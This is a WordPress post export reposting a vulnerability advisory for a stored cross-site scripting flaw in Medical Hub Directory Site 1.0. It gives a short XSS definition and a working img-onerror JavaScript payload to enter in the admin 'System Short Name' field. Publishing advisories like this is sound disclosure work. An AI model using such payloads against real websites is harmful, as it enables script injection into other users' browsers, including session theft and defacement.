{"id":22373,"date":"2022-03-30T19:19:08","date_gmt":"2022-03-30T15:19:08","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166537\/mhds10-xss.txt"},"modified":"2022-04-04T10:27:19","modified_gmt":"2022-04-04T05:57:19","slug":"medical-hub-directory-site-1-0-cross-site-scripting","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/medical-hub-directory-site-1-0-cross-site-scripting\/","title":{"rendered":"Medical Hub Directory Site 1.0 Cross Site Scripting"},"content":{"rendered":"
## Title: Medical Hub Directory Site 1.0 XSS Stored \r\n# Author: Hejap Zairy\r\n# Date: 30.07.2022\r\n# Vendor: https:\/\/www.sourcecodester.com\/php\/15252\/simple-medical-hub-directory-site-phpoop-source-code.html\r\n# Software:https:\/\/www.sourcecodester.com\/sites\/default\/files\/download\/oretnom23\/mhds.zip\r\n# Reference: https:\/\/github.com\/Matrix07ksa\r\n# Tested on: Windows, MySQL, Apache<\/code><\/pre>\n
## Description:
\nStored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user’s browser.<\/p>\n
<\/code><\/pre>\n
Status: CRITICAL
\n[+] Payloads:
\n“`
\nhttps:\/\/0day.gov\/mhds\/admin\/?page=system
\n> System Short Name
\n<img src=1 href=1 onerror=”javascript:alert(‘HEJAP ZAIRY AL-SHARIF’)”><\/img>
\n“`<\/p>\n
<\/code><\/pre>\n
## Proof and Exploit:<\/p>\n
View post on imgur.com<\/a><\/p><\/blockquote>\n